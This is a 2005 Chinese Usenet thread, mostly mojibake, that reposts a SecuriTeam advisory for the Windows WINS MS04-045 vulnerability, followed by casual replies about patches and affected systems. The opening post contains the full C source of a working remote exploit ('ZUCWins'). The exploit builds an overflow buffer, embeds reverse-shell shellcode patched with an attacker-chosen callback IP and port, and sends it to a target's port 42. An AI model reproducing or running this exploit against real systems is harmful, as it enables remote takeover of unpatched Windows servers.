From:	¶Ç³¯Ç°
Subject:	¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Wed, 05 Jan 2005 13:23:21 +0800

¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù

--------------------------------------------------------------------------------

eagles
Summary
As we reported in our previous article: Vulnerability in WINS Allows Remote Code
Execution (MS04-045, Name Validation, Association Context),
(http://www.securiteam.com/windowsntfocus/6N00G1FC0M.html) a vulnerability in
WINS allows remote attacker to cause the WINS server to execue arbitrary code.
The following exploit code can be used to test your system for the mentioned
vulnerability.

Credit:
The information has been provided by zuc.

Details
Exploit:
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : */
/* works on Windows 2000 SP3/SP4 probably every language */
/* Win32 Support - SecuriTeam */
/*************************************************************/

#ifdef WIN32
#include
#include
#include
#include
#include
#include
#include
#include

#define sleep Sleep

#else

#define closesocket close

#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{
int sock, addr, len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

#ifdef WIN32
WORD wVersionRequested;
WSADATA wsaData;
int err;

wVersionRequested = MAKEWORD( 2, 2 );
/* Confirm that the WinSock DLL supports 2.2.*/
/* Note that if the DLL supports versions greater */
/* than 2.2 in addition to 2.2, it will still return */
/* 2.2 in wVersion since that is the version we */
/* requested. */
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
/* Tell the user that we could not find a usable */
/* WinSock DLL. */
printf("WSAStartup faild (function returned error)\n");
return -1;
}
if ( LOBYTE( wsaData.wVersion ) != 2 ||
HIBYTE( wsaData.wVersion ) != 2 ) {
/* Tell the user that we could not find a usable */
/* WinSock DLL. */
WSACleanup( );
printf("WSAStartup faild (winsock 2 wasn't found)\n");
return -1;
}
#endif

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf(" connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
if (rc != 0)
{
printf("Couldn't connect\n");
#ifdef WIN32
rc = WSAGetLastError();
printf("Socket errcode
(http://msdn.microsoft.com/library/en-us/winsock/winsock/windows_sockets_error_codes_2.asp):
%d\n", rc);
#endif
return -1;
}
printf(" sending exploit\n");
send(sock,mess3,lenr,0);
printf(" exploit sent\n");
sleep(5);
shutdown(sock,1);
closesocket(sock);
return 0;
}

void usage()
{
printf("\nUsage:

\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

-------------The End-------------

cn.* USENET
cn.fan ÖÐÎÄIT¼¼Êõ²è×ù
cn.comp.software ×îÐÂÈí¼þ½éÉÜ¼°ÏÂÔØ,°üÀ¨Ìì¿ÕÏÂÔØÕ¾¸üÐÂ,Ã¿ÈÕ0day¸üÐÂ,163ÏÂÔØÕ¾¸üÐÂµÈ
cn.comp.software.shareware ×îcoolÈí¼þÌÖÂÛ
cn.rec.humor ÓÄÄ¬ÏûÇ².Ã¿ÈÕÓÉµ©³óÍ¬Ñ§´óÁ¿¸üÐÂ.»¶Ó¶©ÔÄ
cn.telecom.mobile Ìá¹©Ã¿ÈÕPDAÈí¼þÆÆ½â(°üÀ¨Mobile phone,PalmOs,PocketPc,SymbianOS)

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Wed, 05 Jan 2005 19:08:06 +0800

ÔÎ£¬Õâ¸öºÃÏóÌ«ÍíÁË°É£¬Î¢Èí12ÔÂ14ºÅµÄ°²È«¹«¸æ£¬¶øÇÒÖ»¶Ô·þÎñÆ÷°æµÄÏµÍ³ÓÐÐ§£¬
¸üºÎ¿ö¿ªWINS·þÎñµÄServer¿ÉÄÜÒ²²»ÊÇºÜ¶à°É£¨´ó¶àÊÇ¾ÖÓòÍøµÄ·þÎñÆ÷£¬ÒòÌØÍøÉÏµÄ·þÎñÆ÷Ã´£¬
´ó¸ÅÊÇÍø¹ÜÀÁÁË»òÕßÊÇÍüÁË¹ØÁË~~£©......

ÊÜÓ°ÏìµÄÈí¼þ£º

Microsoft Windows NT Server 4.0 Service Pack 6a ¨C ÏÂÔØ´Ë¸üÐÂ
Microsoft Windows NT Server 4.0 ÖÕ¶Ë·þÎñÆ÷°æ Service Pack 6 ¨C ÏÂÔØ´Ë¸üÐÂ [Ó¢ÎÄ]
Microsoft Windows 2000 Server Service Pack 3 ºÍ Microsoft Windows 2000 Server Service Pack 4 ¨C ÏÂÔØ´Ë¸üÐÂ
Microsoft Windows Server 2003 ¨C ÏÂÔØ´Ë¸üÐÂ
Microsoft Windows Server 2003 64 Î»°æ±¾ ¨C ÏÂÔØ´Ë¸üÐÂ [Ó¢ÎÄ]

²»ÊÜÓ°ÏìµÄÈí¼þ£º

Microsoft Windows 2000 Professional Service Pack 3 ºÍ Microsoft Windows 2000 Professional Service Pack 4
Microsoft Windows XP Service Pack 1 ºÍ Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows 98¡¢Microsoft Windows 98 Second Edition (SE) ºÍ Microsoft Windows Millennium Edition (Me)

ÔÚ Wed, 05 Jan 2005 13:23:21 +0800 Ê±, ¶Ç³¯Ç° Ð´ÁË:
--

>¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
>
>
>--------------------------------------------------------------------------------
>
>eagles
>Summary
>As we reported in our previous article: Vulnerability in WINS Allows Remote Code
>Execution (MS04-045, Name Validation, Association Context),
>(http://www.securiteam.com/windowsntfocus/6N00G1FC0M.html) a vulnerability in
>WINS allows remote attacker to cause the WINS server to execue arbitrary code.
>The following exploit code can be used to test your system for the mentioned
>vulnerability.

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	¶Ç³¯Ç°
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Wed, 05 Jan 2005 22:17:00 +0800

´ó²¿·ÖµÄÍø°ÉÖ÷»úÓ¦¸ÃÔÚÁÐ°É...ºÇºÇ

On Wed, 05 Jan 2005 19:08:06 +0800, Á÷ÐÇ99 wrote:
--

>ÔÎ£¬Õâ¸öºÃÏóÌ«ÍíÁË°É£¬Î¢Èí12ÔÂ14ºÅµÄ°²È«¹«¸æ£¬¶øÇÒÖ»¶Ô·þÎñÆ÷°æµÄÏµÍ³ÓÐÐ§£¬
>¸üºÎ¿ö¿ªWINS·þÎñµÄServer¿ÉÄÜÒ²²»ÊÇºÜ¶à°É£¨´ó¶àÊÇ¾ÖÓòÍøµÄ·þÎñÆ÷£¬ÒòÌØÍøÉÏµÄ·þÎñÆ÷Ã´£¬
>´ó¸ÅÊÇÍø¹ÜÀÁÁË»òÕßÊÇÍüÁË¹ØÁË~~£©......

-------------The End-------------

cn.* USENET
cn.fan ÖÐÎÄIT¼¼Êõ²è×ù
cn.comp.software ×îÐÂÈí¼þ½éÉÜ¼°ÏÂÔØ,°üÀ¨Ìì¿ÕÏÂÔØÕ¾¸üÐÂ,Ã¿ÈÕ0day¸üÐÂ,163ÏÂÔØÕ¾¸üÐÂµÈ
cn.comp.software.shareware ×îcoolÈí¼þÌÖÂÛ
cn.rec.humor ÓÄÄ¬ÏûÇ².Ã¿ÈÕÓÉµ©³óÍ¬Ñ§´óÁ¿¸üÐÂ.»¶Ó¶©ÔÄ
cn.telecom.mobile Ìá¹©Ã¿ÈÕPDAÈí¼þÆÆ½â(°üÀ¨Mobile phone,PalmOs,PocketPc,SymbianOS)

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Thu, 06 Jan 2005 20:08:08 +0800

Íø°É......²»ËµÁË£¬Íø°ÉÖ÷»úµÄÂ©¶´ÂúÉí¶¼ÊÇ£¬Ò²²»ÔÚºõ¶àÒ»¸öÉÙÒ»¸öµÄÁË~~

ÔÚ Wed, 05 Jan 2005 22:17:00 +0800 Ê±, ¶Ç³¯Ç° Ð´ÁË:
--

>´ó²¿·ÖµÄÍø°ÉÖ÷»úÓ¦¸ÃÔÚÁÐ°É...ºÇºÇ
>
>On Wed, 05 Jan 2005 19:08:06 +0800, Á÷ÐÇ99 wrote:
>--
>
>>ÔÎ£¬Õâ¸öºÃÏóÌ«ÍíÁË°É£¬Î¢Èí12ÔÂ14ºÅµÄ°²È«¹«¸æ£¬¶øÇÒÖ»¶Ô·þÎñÆ÷°æµÄÏµÍ³ÓÐÐ§£¬
>>¸üºÎ¿ö¿ªWINS·þÎñµÄServer¿ÉÄÜÒ²²»ÊÇºÜ¶à°É£¨´ó¶àÊÇ¾ÖÓòÍøµÄ·þÎñÆ÷£¬ÒòÌØÍøÉÏµÄ·þÎñÆ÷Ã´£¬
>>´ó¸ÅÊÇÍø¹ÜÀÁÁË»òÕßÊÇÍüÁË¹ØÁË~~£©......

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	=?GB2312?B?vfC8/Q==?=
Subject:	Re: =?GB2312?B?ob7XotLiob/Cqba0uau45qO6V0lOUyBNUzA0LTA0NSBFeHBsbw==?=
Date:	Thu, 06 Jan 2005 09:26:57 +0800

ÎÒÕâ±ßÊÇÓÃSAMBAÎ±×°µÄ£¬Ó¦¸ÃÎÊÌâ²»´ó¡£
¶Ç³¯Ç° Ìáµ½:
> ´ó²¿·ÖµÄÍø°ÉÖ÷»úÓ¦¸ÃÔÚÁÐ°É...ºÇºÇ
>
> On Wed, 05 Jan 2005 19:08:06 +0800, Á÷ÐÇ99 wrote:
> --

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Thu, 06 Jan 2005 20:08:07 +0800

SAMBAºÃÏóÂ©¶´Ò²²»ÉÙ~~

ÔÚ Thu, 06 Jan 2005 09:26:57 +0800 Ê±, ½ð¼ý Ð´ÁË:
--

>ÎÒÕâ±ßÊÇÓÃSAMBAÎ±×°µÄ£¬Ó¦¸ÃÎÊÌâ²»´ó¡£
>¶Ç³¯Ç° Ìáµ½:
>> ´ó²¿·ÖµÄÍø°ÉÖ÷»úÓ¦¸ÃÔÚÁÐ°É...ºÇºÇ
>>
>> On Wed, 05 Jan 2005 19:08:06 +0800, Á÷ÐÇ99 wrote:
>> --

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	=?GB2312?B?vfC8/Q==?=
Subject:	Re: =?GB2312?B?ob7XotLiob/Cqba0uau45qO6V0lOUyBNUzA0LTA0NSBFeHBsbw==?=
Date:	Fri, 07 Jan 2005 16:51:32 +0800

²¹¶¡±ÈÎ¢Èí³öµÃ¿ì¶àÁË¡£
Á÷ÐÇ99 Ìáµ½:
> SAMBAºÃÏóÂ©¶´Ò²²»ÉÙ~~
>
> ÔÚ Thu, 06 Jan 2005 09:26:57 +0800 Ê±, ½ð¼ý Ð´ÁË:
> --
>
>
>>ÎÒÕâ±ßÊÇÓÃSAMBAÎ±×°µÄ£¬Ó¦¸ÃÎÊÌâ²»´ó¡£
>>¶Ç³¯Ç° Ìáµ½:
>>

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Fri, 07 Jan 2005 20:00:07 +0800

Õâ¸öµ¹ÊÇ£¬ºÇºÇ~~

ÔÚ Fri, 07 Jan 2005 16:51:32 +0800 Ê±, ½ð¼ý Ð´ÁË:
--

>²¹¶¡±ÈÎ¢Èí³öµÃ¿ì¶àÁË¡£
>Á÷ÐÇ99 Ìáµ½:
>> SAMBAºÃÏóÂ©¶´Ò²²»ÉÙ~~
>>
>> ÔÚ Thu, 06 Jan 2005 09:26:57 +0800 Ê±, ½ð¼ý Ð´ÁË:
>> --

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Thu, 06 Jan 2005 16:10:07 +0800

²»ÅÂÁË¡£hiahia¡£¡£¡£¡£¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
:²»ÊÜÓ°ÏìµÄÈí¼þ£º
:
:Microsoft Windows 2000 Professional Service Pack 3 ºÍ Microsoft Windows 2000 Professional Service Pack 4
:Microsoft Windows XP Service Pack 1 ºÍ Microsoft Windows XP Service Pack 2
:Microsoft Windows XP 64-Bit Edition Service Pack 1
:Microsoft Windows XP 64-Bit Edition Version 2003
:Microsoft Windows 98¡¢Microsoft Windows 98 Second Edition (SE) ºÍ Microsoft Windows Millennium Edition (Me)
:
:ÔÚ Wed, 05 Jan 2005 13:23:21 +0800 Ê±, ¶Ç³¯Ç° Ð´ÁË:

·çÖÐÖ½Ò³

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Thu, 06 Jan 2005 20:08:07 +0800

ºÇºÇ£¬Õâ¸öÂ©¶´µÈ¼¶Ò²²»¹ýÊÇ¸öÑÏÖØµÈ¼¶µÄ£¬²»ÊÇÎ£¼±µÈ¼¶µÄ£¬ºÇºÇ¡£

ÔÚ Thu, 06 Jan 2005 16:10:07 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
--

>²»ÅÂÁË¡£hiahia¡£¡£¡£¡£¡£
>ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
>:²»ÊÜÓ°ÏìµÄÈí¼þ£º
>:
>:Microsoft Windows 2000 Professional Service Pack 3 ºÍ Microsoft Windows 2000 Professional Service Pack 4
>:Microsoft Windows XP Service Pack 1 ºÍ Microsoft Windows XP Service Pack 2
>:Microsoft Windows XP 64-Bit Edition Service Pack 1
>:Microsoft Windows XP 64-Bit Edition Version 2003
>:Microsoft Windows 98¡¢Microsoft Windows 98 Second Edition (SE) ºÍ Microsoft Windows Millennium Edition (Me)
>:
>:ÔÚ Wed, 05 Jan 2005 13:23:21 +0800 Ê±, ¶Ç³¯Ç° Ð´ÁË:

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Sat, 08 Jan 2005 23:44:07 +0800

Ê±Ê±¸üÐÂ¡£¡£¡£¡£¡£Ò»¸ö¶¼²»¸ÒÀÏÂ¡£¡£¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:

:ºÇºÇ£¬Õâ¸öÂ©¶´µÈ¼¶Ò²²»¹ýÊÇ¸öÑÏÖØµÈ¼¶µÄ£¬²»ÊÇÎ£¼±µÈ¼¶µÄ£¬ºÇºÇ¡£
:
:ÔÚ Thu, 06 Jan 2005 16:10:07 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

·çÖÐÖ½Ò³

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Sun, 09 Jan 2005 19:40:35 +0800

µ¨Õ½ÐÄ¾ª~~

ÔÚ Sat, 08 Jan 2005 23:44:07 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
--

>Ê±Ê±¸üÐÂ¡£¡£¡£¡£¡£Ò»¸ö¶¼²»¸ÒÀÏÂ¡£¡£¡£
>ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
>
>
>:ºÇºÇ£¬Õâ¸öÂ©¶´µÈ¼¶Ò²²»¹ýÊÇ¸öÑÏÖØµÈ¼¶µÄ£¬²»ÊÇÎ£¼±µÈ¼¶µÄ£¬ºÇºÇ¡£
>:
>:ÔÚ Thu, 06 Jan 2005 16:10:07 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Tue, 11 Jan 2005 18:26:01 +0800

±»ÅªÅÂÁË¡£¡£¡£¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:

:µ¨Õ½ÐÄ¾ª~~
:
:ÔÚ Sat, 08 Jan 2005 23:44:07 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

·çÖÐÖ½Ò³

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Tue, 11 Jan 2005 21:21:25 +0800

ºÇºÇ£¬Ò»³¯±»ÉßÒ§.......

ÔÚ Tue, 11 Jan 2005 18:26:01 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
--

>±»ÅªÅÂÁË¡£¡£¡£¡£
>ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
>
>
>:µ¨Õ½ÐÄ¾ª~~
>:
>:ÔÚ Sat, 08 Jan 2005 23:44:07 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
>
>·çÖÐÖ½Ò³

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Fri, 14 Jan 2005 13:39:58 +0800

¿´¼û±ðÈË±»Ò§ÁË£¬ÏÅµÃ¡£¡£¡£¡£¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:

:ºÇºÇ£¬Ò»³¯±»ÉßÒ§.......
:
:ÔÚ Tue, 11 Jan 2005 18:26:01 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

·çÖÐÖ½Ò³

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Fri, 14 Jan 2005 20:28:42 +0800

ºÇºÇºÇºÇ£¬±»Ò§µÄ¿ÉÄÜµ¹Ò²²»¹ýÈç´Ë£¬µ¹ÊÇ°ÑÄãÏÅµÃ.......

ÔÚ Fri, 14 Jan 2005 13:39:58 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
--

>¿´¼û±ðÈË±»Ò§ÁË£¬ÏÅµÃ¡£¡£¡£¡£¡£
>ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
>
>
>:ºÇºÇ£¬Ò»³¯±»ÉßÒ§.......
>:
>:ÔÚ Tue, 11 Jan 2005 18:26:01 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
>
>·çÖÐÖ½Ò³

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
ÖÐ¹úfansµÄÐÂÎÅ×é£¬ÖÐ¹úfansµÄ¼Ò......

From:	·çÖÐÖ½Ò³
Subject:	Re: Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Mon, 17 Jan 2005 13:15:51 +0800

¾ÍÏñÊÇ±»É±µÄÒÑ¾²»º¦ÅÂÁË£¬µ«ÊÇ¿´ÁËÉ±ÈËµÄµ¹ÊÇ±»ÏÅ»µÁË¡£
ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:

:ºÇºÇºÇºÇ£¬±»Ò§µÄ¿ÉÄÜµ¹Ò²²»¹ýÈç´Ë£¬µ¹ÊÇ°ÑÄãÏÅµÃ.......
:
:ÔÚ Fri, 14 Jan 2005 13:39:58 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:

·çÖÐÖ½Ò³

QQ: 29024977(Çë×¢Ã÷Éí·Ý)
MSN: guoyun01(at)hotmail(dot)com
»¶Ó·ÃÎÊnews://news.yaako.comºÍÈ«ÊÀ½ç½»Á÷
Blog: http://fzhzhy.3322.org

From:	Á÷ÐÇ99
Subject:	Re: ¡¾×¢Òâ¡¿Â©¶´¹«¸æ£ºWINS MS04-045 Exploit Code--×ªÌù
Date:	Mon, 17 Jan 2005 22:58:05 +0800

ÎÒµ¹£¬Õâ¸ö±È·½ÊµÔÚÊÇ.......

ÔÚ Mon, 17 Jan 2005 13:15:51 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
--

>¾ÍÏñÊÇ±»É±µÄÒÑ¾²»º¦ÅÂÁË£¬µ«ÊÇ¿´ÁËÉ±ÈËµÄµ¹ÊÇ±»ÏÅ»µÁË¡£
>ÔÚÉÏÒ»»ØÖÐ£¬ÅÖÅÖµÄÁ÷ÐÇ99 ÕÅ×Å´ó×ìËµµ½:
>
>
>:ºÇºÇºÇºÇ£¬±»Ò§µÄ¿ÉÄÜµ¹Ò²²»¹ýÈç´Ë£¬µ¹ÊÇ°ÑÄãÏÅµÃ.......
>:
>:ÔÚ Fri, 14 Jan 2005 13:39:58 +0800 Ê±, ·çÖÐÖ½Ò³ Ð´ÁË:
>
>·çÖÐÖ½Ò³

ÎÒÊÇÁ÷ÐÇ£¬ËäÈ»Ò»ÉÁ¶ø¹ý£¬
Ò²Ï£ÍûÄÜÁôÏÂÃÀÀöµÄ¹âÃ¢¡£
»¶Ó¹âÁÙ news://news.cn99.com/cn.fan
